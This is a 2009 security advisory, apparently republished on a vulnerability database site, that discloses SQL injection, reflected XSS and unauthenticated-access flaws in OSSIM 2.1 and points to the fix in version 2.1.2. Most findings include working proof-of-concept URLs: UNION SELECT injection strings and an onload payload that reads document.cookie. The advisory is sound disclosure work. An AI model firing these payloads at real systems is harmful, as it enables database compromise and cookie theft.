OSSIM version 2.1 remote SQL injection and cross site scripting

2009.09.25
Credit: DSecRG
Risk: Medium
Local: No
Remote: Yes

OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities. 1. SQL Injections 2. Linked XSS 3. Unauthorized access Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055 Application: OSSIM Versions Affected: 2.1 and may be 2.1.1 Vendor URL: http://ossim.net/ Bug: SQL Injection,XSS, Unauthorized access Exploits: YES Reported: 07.09.2009 Vendor response: 09.09.2009 Solution: YES (version 2.1.2) Date of Public Advisory:21.09.2009 Author: Sintsov Alexey of Digital Security Research Group [DSecRG] Details ******* 1.1 SQL injections in repository Attacker need to be authorized in system for success. Vulnerable script - repository_document.php Vulnerable parameter - id_document Example ******* http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3 union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1 1.2 SQL injections in repository Attacker need to be authorized in system for success. Vulnerable script - repository_links.php Vulnerable parameter - id_document Example ******* http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3 union select 1,user(),3,4,5,6 1.3 SQL injections in repository Attacker need to be authorized in system for success. Vulnerable script - repository_editdocument.php Vulnerable parameter - id_document Example ******* http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3 union select 1,user(),3,4,5,6 1.4 SQL injection in policy scripts Attacker need to be authorized in system for success. Vulnerable script - getpolicy.php Vulnerable parameter - group Example ******* http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1 1.5 SQL injection in policy scripts Attacker need to be authorized in system for success. Vulnerable script - newhostgroupform.php Vulnerable parameter - name Example ******* http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select user(),'b','c','d','f 1.6 SQL injection in policy scripts Attacker need to be authorized in system for success. Vulnerable script - modifynetform.php Vulnerable parameter - name Example ******* http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select user(),'b','c','d','e','f','g','h','a And others scripts in policy menu. 2. Linked XSS in main menu Vulnerable script /ossim/ Vulnerable parameter - option Example ******* http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a=" 3. Access to data without authentication. Unauthorized user can see graphs and infrastructure Example ******* Access to the graph: http://OSSIM-SERVER/ossim/graphs/alarms_events.php Internal infrastructure view: http://OSSIM-SERVER/ossim/host/draw_tree.php Fix Information *************** Upgrade to version 2.1.2 About ***** Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com

References:

http://www.securityfocus.com/bid/36504
http://www.securityfocus.com/archive/1/archive/1/506663/100/0/threaded
http://secunia.com/advisories/36867
http://dsecrg.com/pages/vul/show.php?id=155


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top